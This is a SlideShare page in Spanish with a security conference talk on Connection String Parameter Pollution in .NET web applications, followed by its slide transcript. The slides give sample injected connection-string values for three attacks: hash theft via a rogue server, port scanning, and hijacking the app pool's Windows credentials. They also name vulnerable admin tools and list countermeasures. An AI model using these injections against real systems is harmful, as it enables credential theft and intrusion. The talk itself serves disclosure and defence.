SlideShare una empresa de Scribd logo

Connection String Parameter Pollution

Descargar como PPT, PDF
Chema Alonso, profile picture
Chema Alonso

El documento habla sobre las cadenas de conexión que usan las aplicaciones web para conectarse a bases de datos y cómo pueden ser objeto de ataques mediante la inyección de parámetros maliciosos. Explica tres tipos de ataques posibles: robo de credenciales, escaneo de puertos y robo de credenciales de Windows. Finalmente, proporciona algunas contramedidas para mejorar la seguridad frente a este tipo de amenazas.

Tecnología
1 de 33
Descargado 164 veces
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Chema Alonso Informática 64 Chema Alonso Informática 64
Cadenas de Conexión Definen la manera en que una aplicación web se conecta a un repositorio de datos Hay cadenas de conexión para: Bases de datos Archivos en sistemas de ficheros Servidores LDAP en procesos de Binding …
Cadenas de conexión a BBDD Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;
Se pueden encontrar en Google
Se pueden encontrar en Google
Ficheros UDL
Credenciales Cuentas de Sistema Operativo Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Cuentas de la Base de datos Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
Syslogins Tabla usuarios Cadena de conexión 1.- La aplicación web se conecta con credenciales de la BD. 2.- Se piden credenciales al usuario. 3.- La aplicación web comprueba las credenciales en una tabla de usuarios. Select from tabla La aplicación Web controla la autenticación Motor de Base de datos App en Servidor Web Validación usuarios en aplicación web
Syslogins Cadena de conexión 1.- Se piden credenciales al usuario. 2.- La aplicación web construye la cadena de conexión con las credenciales del usuario. El motor de BBDD controla la autenticación Validación usuarios en motor de BBDD Motor de Base de datos App en Servidor Web
Connection String Attacks Es posible inyectar parámetros en las cadenas de conexión separándolos por punto y coma. Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername ; Password = myPassword; Encryption = Off ;
ConnectionStringBuiler Incluido en el .NET Framework 2.0 Crea cadenas de conexión mediante parámetros Impide la inyección de código
La realidad
Connection String Parameter Pollution La idea es inyectar un parámetro que ya existe Duplicando el valor del parámetro, el último prevalece en los entornos .NET. Esto permite a un atacante cambiar completamente el funcionamiento de la cadena de conexión y de la aplicación.
CSPP Attack 1: Robo de Hash 1.- Se monta un servidor controlado: Rogue_Server 2.- Se activa un sniffer de credenciales Cain/Wireshark 3.- Se hace una polución del parámetro Data_Source=Rogue_Server 4.- Se fuerza el uso de autenticación Windows Integrated Security=true
CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server ; Password= ;Integrated Security=True ;
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning 1.- Se hace una polución del parámetro con el servidor a escanear y el puerto Data_Source=Target_Server,target_Port 2.- Se evalúan los mensajes de error de la aplicación
CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port ; Password= Void ;
CSPP 2: myLittleAdmin Puerto Abierto
CSPP 2: myLittleAdmin Puerto Cerrado
CSPP Attack 3: Hijacking Web Credentials 1.- Se hace una polución del parámetro Data_Source=Target_Server 2.- Se fuerza el uso de autenticación Windows Integrated Security=true 3.- El pool de aplicaciones envía la cuenta de Windows con que está corriendo para autenticarse en el motor de bases de datos
CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server ; Password= ;Integrated Security=true ;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin/myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
Otras bases de datos MySQL no soporta autenticación integrada Oracle SÍ soporta autenticación integrada en Windows y es posible realizar estos ataques Además es posible cambiar la conexión de nivel para pasarla a conexión como sysdba
Demo Demo
myLittleAdmin/myLittleBackup myLittleTools ha sacado un advisory de seguridad y un parche
ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
ASP.NET Web Data Admistrator ASP Web Data Administrator es segura en su versión liberada en CodePlex
Contramedidas Fortificación de Firewall Fortificación de cuentas utilizadas en pool de aplicaciones y bases de datos. Usar ConnectionStringBuilder Filtrar el ; )
¿Preguntas? Contacto Chema Alonso [email_address] http://www.informatica64.com http://elladodelmal.blogspot.com Autores Chema Alonso Manuel Fernández Alejandro Martín Bailón Antonio Guzmán

Más contenido relacionado

PDF
autenticacion apache con mysql
Roberto Almena
 
DOCX
Bases de Datos
GabrielaCely3
 
PDF
Examen Máster Seguridad UEM
Chema Alonso
 
PPT
Contaminacion Ambiental=Ingles=
guest284c5a
 
PPT
Tresure hunt
yamilarognone
 
PPT
Treasure hunt yamila
yamiros
 
PPTX
Heal the world
anacreggiardo02
 
PPT
Reciclasmaster
JimmyP
 
autenticacion apache con mysql
Roberto Almena
 
Bases de Datos
GabrielaCely3
 
Examen Máster Seguridad UEM
Chema Alonso
 
Contaminacion Ambiental=Ingles=
guest284c5a
 
Tresure hunt
yamilarognone
 
Treasure hunt yamila
yamiros
 
Heal the world
anacreggiardo02
 
Reciclasmaster
JimmyP
 

Destacado (20)

PDF
3 r elementos
Marielba Valenzuela
 
KEY
Recycle. teach. have fun
camilabon
 
PPT
Pollution joaquin cuadrado salazar
joaquinCS
 
PPTX
Pollution
5astandrew
 
PPSX
PROYECTO "EL RECICLAJE"
CLAUDIA CASTILLO
 
PPT
Enviroment pollution
Carmina Orellana Ahumada
 
PPTX
Sobrepoblacion
MayDGallagher
 
PPTX
Ingles de conversacion
Camilo Avila
 
PPTX
Exposición de ingles
jessmile
 
PPT
PresentacióN Power Point Ingles
rdn100
 
PPT
Deforestacion
David Suarez
 
PPTX
Temas básicos de ingles 1
Jefferson Peñata
 
PPTX
Power point ingles conversacional
marcelinocanino
 
PPTX
Deforestacion presentacion
Asdrubal
 
PPT
Ingles basico 1
sharonortega
 
PPTX
Exposicion italia en ingles
Luis Guillermo Gamarra Vásquez
 
PPT
Powerpoint deforestacion
Gabriel Buda
 
PPT
Inglés Básico 1 - Gramatica simple
leosanchezg
 
PPT
Presentación personal
Javier.Garzon
 
PPT
La deforestación
Emilie
 
3 r elementos
Marielba Valenzuela
 
Recycle. teach. have fun
camilabon
 
Pollution joaquin cuadrado salazar
joaquinCS
 
Pollution
5astandrew
 
PROYECTO "EL RECICLAJE"
CLAUDIA CASTILLO
 
Enviroment pollution
Carmina Orellana Ahumada
 
Sobrepoblacion
MayDGallagher
 
Ingles de conversacion
Camilo Avila
 
Exposición de ingles
jessmile
 
PresentacióN Power Point Ingles
rdn100
 
Deforestacion
David Suarez
 
Temas básicos de ingles 1
Jefferson Peñata
 
Power point ingles conversacional
marcelinocanino
 
Deforestacion presentacion
Asdrubal
 
Ingles basico 1
sharonortega
 
Exposicion italia en ingles
Luis Guillermo Gamarra Vásquez
 
Powerpoint deforestacion
Gabriel Buda
 
Inglés Básico 1 - Gramatica simple
leosanchezg
 
Presentación personal
Javier.Garzon
 
La deforestación
Emilie
 
Publicidad

Similar a Connection String Parameter Pollution (20)

PDF
Ataques a-bases-de-datos
Juvenal Hernandez
 
PPT
Trabajo de software
Patricia Reyna
 
PDF
Sql injection
Mauro Gomez Mejia
 
PDF
Ataques a-bases-de-datos
alan moreno
 
PPTX
Dprn3 u3 a1_aloo
AlejandroOsorio74
 
PPT
Asegúr@IT III - Ataques SQL Injection masivos
Chema Alonso
 
PPTX
Connection
Thalia Regalado Juape
 
PDF
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Christian Martorella
 
PDF
All your data are belong to us - FIST Conference 2007
Christian Martorella
 
PPT
Ponencia sql avanzado y automatizado
n3xasec
 
PPTX
Aprendiz unad
davidalbanc
 
PPTX
Aprendiz unad
davidalbanc
 
PPTX
Modoconexion
fanyto
 
PDF
Anatomía de un ataque a tns listener
yt f
 
DOCX
Practica sql i,ii
Omar Salazar
 
PPTX
Mejores prácticas desarrollo de base de datos
Eduardo Castro
 
PPT
Administración de base de datos oracle - sesion 2
Sefira111
 
PDF
Seguridad
VLASLOV
 
DOCX
ADO
Jairo Quiroz Cabanillas
 
PPTX
Tópicos Avanzados de Programación - Unidad 4 Acceso a datos
José Antonio Sandoval Acosta
 
Ataques a-bases-de-datos
Juvenal Hernandez
 
Trabajo de software
Patricia Reyna
 
Sql injection
Mauro Gomez Mejia
 
Ataques a-bases-de-datos
alan moreno
 
Dprn3 u3 a1_aloo
AlejandroOsorio74
 
Asegúr@IT III - Ataques SQL Injection masivos
Chema Alonso
 
Connection
Thalia Regalado Juape
 
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Christian Martorella
 
All your data are belong to us - FIST Conference 2007
Christian Martorella
 
Ponencia sql avanzado y automatizado
n3xasec
 
Aprendiz unad
davidalbanc
 
Aprendiz unad
davidalbanc
 
Modoconexion
fanyto
 
Anatomía de un ataque a tns listener
yt f
 
Practica sql i,ii
Omar Salazar
 
Mejores prácticas desarrollo de base de datos
Eduardo Castro
 
Administración de base de datos oracle - sesion 2
Sefira111
 
Seguridad
VLASLOV
 
ADO
Jairo Quiroz Cabanillas
 
Tópicos Avanzados de Programación - Unidad 4 Acceso a datos
José Antonio Sandoval Acosta
 
Publicidad

Más de Chema Alonso (20)

PPTX
CyberCamp 2015: Low Hanging Fruit
Chema Alonso
 
PDF
Índice Pentesting con Kali 2.0
Chema Alonso
 
PDF
Configurar y utilizar Latch en Magento
Chema Alonso
 
PPTX
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Chema Alonso
 
PDF
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
Chema Alonso
 
PDF
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 
PDF
Dorking & Pentesting with Tacyt
Chema Alonso
 
PDF
Pentesting con PowerShell: Libro de 0xWord
Chema Alonso
 
PDF
Foca API v0.1
Chema Alonso
 
PDF
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Chema Alonso
 
PPTX
It's a Kind of Magic
Chema Alonso
 
PPTX
Ingenieros y hackers
Chema Alonso
 
PDF
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Chema Alonso
 
PDF
Auditoría de TrueCrypt: Informe final fase II
Chema Alonso
 
PPTX
El juego es el mismo
Chema Alonso
 
PDF
El Hardware en Apple ¿Es tan bueno?
Chema Alonso
 
PDF
Latch en Linux (Ubuntu): El cerrojo digital
Chema Alonso
 
PDF
Hacking con Python
Chema Alonso
 
PPTX
Shuabang Botnet
Chema Alonso
 
PPTX
Tu iPhone es tan (in)seguro como tu Windows
Chema Alonso
 
CyberCamp 2015: Low Hanging Fruit
Chema Alonso
 
Índice Pentesting con Kali 2.0
Chema Alonso
 
Configurar y utilizar Latch en Magento
Chema Alonso
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Chema Alonso
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
Chema Alonso
 
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 
Dorking & Pentesting with Tacyt
Chema Alonso
 
Pentesting con PowerShell: Libro de 0xWord
Chema Alonso
 
Foca API v0.1
Chema Alonso
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Chema Alonso
 
It's a Kind of Magic
Chema Alonso
 
Ingenieros y hackers
Chema Alonso
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Chema Alonso
 
Auditoría de TrueCrypt: Informe final fase II
Chema Alonso
 
El juego es el mismo
Chema Alonso
 
El Hardware en Apple ¿Es tan bueno?
Chema Alonso
 
Latch en Linux (Ubuntu): El cerrojo digital
Chema Alonso
 
Hacking con Python
Chema Alonso
 
Shuabang Botnet
Chema Alonso
 
Tu iPhone es tan (in)seguro como tu Windows
Chema Alonso
 

Último (20)

PDF
Maste clas de estructura metálica y arquitectura
juancarlos542581
 
PDF
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
ronmyjosecanaszambra
 
PDF
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
PDF
informe_fichas1y2_corregido.docx (2) (1).pdf
edepsantiagoalfonso
 
PDF
capacitación de aire acondicionado Bgh r 410
MiriamVargas760642
 
PDF
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
Espanhol Online
 
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
PPT
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
PPTX
Presentacion de Alba Curso Auditores Internos ISO 19011
AlexandroDeAlbaGuerr
 
PDF
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
PPTX
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
PDF
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
PPTX
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
PPTX
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
whomarxxdemie
 
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
saberpublicidadsas
 
PDF
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
JoseCarrasco807534
 
PPTX
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 
Maste clas de estructura metálica y arquitectura
juancarlos542581
 
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
ronmyjosecanaszambra
 
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
informe_fichas1y2_corregido.docx (2) (1).pdf
edepsantiagoalfonso
 
capacitación de aire acondicionado Bgh r 410
MiriamVargas760642
 
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
Espanhol Online
 
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
Presentacion de Alba Curso Auditores Internos ISO 19011
AlexandroDeAlbaGuerr
 
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
whomarxxdemie
 
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
saberpublicidadsas
 
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
Power Point Nicolás Carrasco (disertación Roblox).pptx
JoseCarrasco807534
 
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 

Connection String Parameter Pollution

  • 1. Chema Alonso Informática 64 Chema Alonso Informática 64
  • 2. Cadenas de Conexión Definen la manera en que una aplicación web se conecta a un repositorio de datos Hay cadenas de conexión para: Bases de datos Archivos en sistemas de ficheros Servidores LDAP en procesos de Binding …
  • 3. Cadenas de conexión a BBDD Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;
  • 7. Credenciales Cuentas de Sistema Operativo Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Cuentas de la Base de datos Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
  • 8. Syslogins Tabla usuarios Cadena de conexión 1.- La aplicación web se conecta con credenciales de la BD. 2.- Se piden credenciales al usuario. 3.- La aplicación web comprueba las credenciales en una tabla de usuarios. Select from tabla La aplicación Web controla la autenticación Motor de Base de datos App en Servidor Web Validación usuarios en aplicación web
  • 9. Syslogins Cadena de conexión 1.- Se piden credenciales al usuario. 2.- La aplicación web construye la cadena de conexión con las credenciales del usuario. El motor de BBDD controla la autenticación Validación usuarios en motor de BBDD Motor de Base de datos App en Servidor Web
  • 10. Connection String Attacks Es posible inyectar parámetros en las cadenas de conexión separándolos por punto y coma. Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername ; Password = myPassword; Encryption = Off ;
  • 11. ConnectionStringBuiler Incluido en el .NET Framework 2.0 Crea cadenas de conexión mediante parámetros Impide la inyección de código
  • 13. Connection String Parameter Pollution La idea es inyectar un parámetro que ya existe Duplicando el valor del parámetro, el último prevalece en los entornos .NET. Esto permite a un atacante cambiar completamente el funcionamiento de la cadena de conexión y de la aplicación.
  • 14. CSPP Attack 1: Robo de Hash 1.- Se monta un servidor controlado: Rogue_Server 2.- Se activa un sniffer de credenciales Cain/Wireshark 3.- Se hace una polución del parámetro Data_Source=Rogue_Server 4.- Se fuerza el uso de autenticación Windows Integrated Security=true
  • 15. CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server ; Password= ;Integrated Security=True ;
  • 17. CSPP Attack 2: Port Scanning 1.- Se hace una polución del parámetro con el servidor a escanear y el puerto Data_Source=Target_Server,target_Port 2.- Se evalúan los mensajes de error de la aplicación
  • 18. CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port ; Password= Void ;
  • 19. CSPP 2: myLittleAdmin Puerto Abierto
  • 20. CSPP 2: myLittleAdmin Puerto Cerrado
  • 21. CSPP Attack 3: Hijacking Web Credentials 1.- Se hace una polución del parámetro Data_Source=Target_Server 2.- Se fuerza el uso de autenticación Windows Integrated Security=true 3.- El pool de aplicaciones envía la cuenta de Windows con que está corriendo para autenticarse en el motor de bases de datos
  • 22. CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server ; Password= ;Integrated Security=true ;
  • 23. CSPP Attack 3: Web Data Administrator
  • 24. CSPP Attack 3: myLittleAdmin/myLittleBackup
  • 25. CSPP Attack 3: ASP.NET Enterprise Manager
  • 26. Otras bases de datos MySQL no soporta autenticación integrada Oracle SÍ soporta autenticación integrada en Windows y es posible realizar estos ataques Además es posible cambiar la conexión de nivel para pasarla a conexión como sysdba
  • 28. myLittleAdmin/myLittleBackup myLittleTools ha sacado un advisory de seguridad y un parche
  • 29. ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
  • 30. ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
  • 31. ASP.NET Web Data Admistrator ASP Web Data Administrator es segura en su versión liberada en CodePlex
  • 32. Contramedidas Fortificación de Firewall Fortificación de cuentas utilizadas en pool de aplicaciones y bases de datos. Usar ConnectionStringBuilder Filtrar el ; )
  • 33. ¿Preguntas? Contacto Chema Alonso [email_address] http://www.informatica64.com http://elladodelmal.blogspot.com Autores Chema Alonso Manuel Fernández Alejandro Martín Bailón Antonio Guzmán